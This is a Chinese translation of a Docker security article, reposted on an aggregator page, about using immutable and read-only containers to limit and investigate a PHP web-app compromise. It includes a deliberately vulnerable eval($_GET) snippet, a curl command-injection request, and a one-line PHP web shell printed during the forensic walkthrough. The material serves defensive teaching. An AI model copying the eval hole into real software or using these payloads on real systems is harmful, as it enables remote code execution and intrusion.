使用不可变基础设施让系统更安全-低调大师

使用不可变基础设施让系统更安全

2017-10-10 711

本文讲的是使用不可变基础设施让系统更安全【编者的话】DiogoMónica是Docker的安全领导者。他是Square的早期员工，领导平台安全团队。获得计算机科学学士学位，硕士和博士学位。他担任几家安全初创公司的顾问，是一名长期的IEEE志愿者。本文他提供一个利用容器的不变性来防御黑客攻击的新思路。

Docker容器的一个整洁之处在于它们是不可变的。 Docker附带一个写入时复制文件系统，这意味着基本映像不能被修改，除非你显式地做一个提交。

这么做的原因之一是你很容易检查偏差，如果试图调查一个安全事件，这可能会派上用场。

演示应用程序

以下面的演示架构为例：

我们有一个在前端运行的 PHP应用程序，以及一个充当我们的后端数据库的MySQL服务器。你可以执行下面的命令：

 docker run -d --name db -e MYSQL_ROOT_PASSWORD=insecurepwd mariadb
 docker run -d -p 80:80 --link db:db diogomonica/phphack

当你已经运行了数据库和前端，你应该可以看到如下的页面：

不幸的是，并不像别的正常的PHP应用程序，这个应用程序有一个远程代码执行漏洞：

if($links) {  
<h3>Links found</h3>  
... 
eval($_GET['shell']);  
?>

它看起来像有人在使用本不该被使用的 eval ！任何攻击者都可以利用此漏洞，并在远程主机上执行任意命令：

 curl -s http://localhost/\?shell\=system\("id"\)\; | grep "uid="
uid=33(www-data) gid=33(www-data) groups=33(www-data)

任何攻击者对被攻击的主机做的第一个操作是下载PHP shell和工具包。有些攻击者甚至可能会重新改造你的网站：

从被黑中恢复回来

回到不变性，写时拷贝文件系统提供的一个很酷的事情是能够看到发生的所有更改。通过使用 docker diff 命令，我们可以看到攻击者对文件的所有修改：

 docker diff pensive_meitner
C /run  
C /run/apache2  
A /run/apache2/apache2.pid  
C /run/lock  
C /run/lock/apache2  
C /var  
C /var/www  
C /var/www/html  
C /var/www/html/index.html  
A /var/www/html/shell.php

很有趣。似乎攻击者不仅修改了我们的 index.html ，而且还下载了一个 php-shell ，命名为 shell.php 。但我们的重点应该是让网站恢复回来并重新上线。

我们通过做一个docker提交来存储这个镜像以供后续做分析，并且由于容器是不可变的，我们可以重新启动我们的容器，让业务继续提供服务：

 docker commit pensive_meitner
sha256:ebc3cb7c3a312696e3fd492d0c384fe18550ef99af5244f0fa6d692b09fd0af3  
 docker kill pensive_meitner
 docker run -d -p 80:80 --link db:db diogomonica/phphack

我们现在可以回到保存的镜像，看看攻击者修改了什么

 docker run -it ebc3cb7c3a312696e3fd492d0c384fe18550ef99af5244f0fa6d692b09fd0af3 sh
# cat index.html
<blink>HACKED BY SUPER ELITE GROUP OF HACKERS</blink>  
# cat shell.php
<?php  
eval($_GET['cmd']);  
?>

这看起来像是我们刚刚被著名的超级精英集团黑客(SUPER ELITE GROUP OF HACKERS)入侵了。

增加黑客攻击成本

在被攻击后查看攻击内容是一个很实用的功能，但是如何才能避免被攻击？这个时候 --read-only 就要发挥作用了。

--read-only 会让Docker不允许任何在容器的file-system内进行写入操作。它可以避免 index.php 被修改，更重要的是，它不会允许攻击者下载php shell，以及任何其他对于攻击者来说有用的工具。

我们下面来试验一下：

 docker run -p 80:80 --link db:db -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --sig-proxy=false --read-only diogomonica/phphack
...
172.17.0.1 - - [04/Sep/2016:03:59:06 +0000] "GET / HTTP/1.1" 200 219518 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48"  
sh: 1: cannot create index.html: Read-only file system

由于我们的文件系统现在是只读状态，因此攻击者无法修改index.html 。

这个方法能完全阻止攻击吗？

肯定是不可以的。在我们能够修复RCE漏洞之前，攻击者依然可以在host上运行代码，偷取我们的权限，在数据库中盗取数据。

但是尽管如此，我们毕竟通过组合最小化镜像和一些非常酷的 Docker安全功能提升了黑客的攻击难度，让系统变得更安全了一些。

总结

我们的应用程序的安全性永远不会是完美的，但是具有不可变的基础架构有助于事件响应，允许快速恢复，并使攻击者的成本加大。

如果通过使用强大的沙箱和调整一些旋钮，你可以使你的应用程序更安全，你为什么不？

原文链接： Increasing Attacker Cost Using Immutable Infrastructure （翻译：高洪涛）

===========================================
译者介绍

高洪涛，当当网架构师，开源数据库分库分表中间件Sharding-JDBC作者。目前从事Docker，Mesos相关工作

原文发布时间为：2017-01-05

本文作者：高洪涛

本文来自云栖社区合作伙伴Dockerone.io，了解相关信息可以关注Dockerone.io。

原文标题：使用不可变基础设施让系统更安全

微信关注我们

原文链接：https://yq.aliyun.com/articles/225234

转载内容版权归作者及来源网站所有！

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

云栖大会第二天高性能计算，打call送礼

高性能计算（HPC），也即超级计算机的发展速度超越了摩尔定律，得益于此，作为大国重器的超算被广泛应用于教育，科研，企业的科学工程计算，有限的超算中心和自建计算集群的方式已无法满足超算用户计算业务和创新的需要，特别对降低超算总体拥有成本，无需排队获取资源，弹性规模，按使用付费软件和安全运维等核心需求，云上超算是唯一解决之道。云栖大会第二天，高性能计算专场，何万青博士为你分享技术精髓。12日，B-3-5厅，上午9点半。阿里云在飞天系统架构之上，开发出弹性高性能计算E-HPC平台产品，超算用户可以便捷地生成集群，节点基于阿里云丰富的弹性计算ECS和异构计算GPU产品，VPC网络和高可靠可用的NAS并行存储等不断升级演进的IaaS底层，E-HPC以云计算模块和OpenAPI的模式提供了超算需求的全部

2017-10-10

694

本文讲的是新浪微博应对弹性扩容的架构演进【编者的话】本文结合架构图和数据图，详细介绍了LNMP服务的Docker化，如何制作PHP服务相关镜像，最后结合DCP平台完成PHP服务的首次部署、配置更改、代码上线等。目前，新浪微博主站TV视频站、头条问答、话题、红包飞、通行证等LNMP项目已全量部署，方便弹性扩容。同时，也将继续推进PC主站服务的部署。【3 天烧脑式 Docker 训练营 | 上海站】随着Docker技术被越来越多的人所认可，其应用的范围也越来越广泛。本次培训我们理论结合实践，从Docker应该场景、持续部署与交付、如何提升测试效率、存储、网络、监控、安全等角度进行。从后端来讲，新浪微博可以分为Java和LNMP两大体系，特别是在LNMP方面积累了很多经验。发展初期，新浪微博侧重从性能角度出发，做架构方面的调整和优化。近两年，它投入人力、物力，把重点放在了弹性扩容方面。新浪微博遭遇流量峰值挑战新浪微博作为社交产品，经常出现因某些原因所致的话题突发流量峰值，且峰值不可预估。例如：紧急突发事件：白百合出轨、周一见、宝宝离婚、女排夺冠大型活动及三节保障：红包飞 Push...

2017-10-10

698

资源下载

更多资源

Mario

马里奥是站在游戏界顶峰的超人气多面角色。马里奥靠吃蘑菇成长，特征是大鼻子、头戴帽子、身穿背带裤，还留着胡子。与他的双胞胎兄弟路易基一起，长年担任任天堂的招牌角色。

Nacos

Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service 的首字母简称，一个易于构建 AI Agent 应用的动态服务发现、配置管理和AI智能体管理平台。Nacos 致力于帮助您发现、配置和管理微服务及AI智能体应用。Nacos 提供了一组简单易用的特性集，帮助您快速实现动态服务发现、服务配置、服务元数据、流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。

Rocky Linux

Rocky Linux（中文名：洛基）是由Gregory Kurtzer于2020年12月发起的企业级Linux发行版，作为CentOS稳定版停止维护后与RHEL（Red Hat Enterprise Linux）完全兼容的开源替代方案，由社区拥有并管理，支持x86_64、aarch64等架构。其通过重新编译RHEL源代码提供长期稳定性，采用模块化包装和SELinux安全架构，默认包含GNOME桌面环境及XFS文件系统，支持十年生命周期更新。

WebStorm

WebStorm 是jetbrains公司旗下一款JavaScript 开发工具。目前已经被广大中国JS开发者誉为“Web前端开发神器”、“最强大的HTML5编辑器”、“最智能的JavaScript IDE”等。与IntelliJ IDEA同源，继承了IntelliJ IDEA强大的JS部分的功能。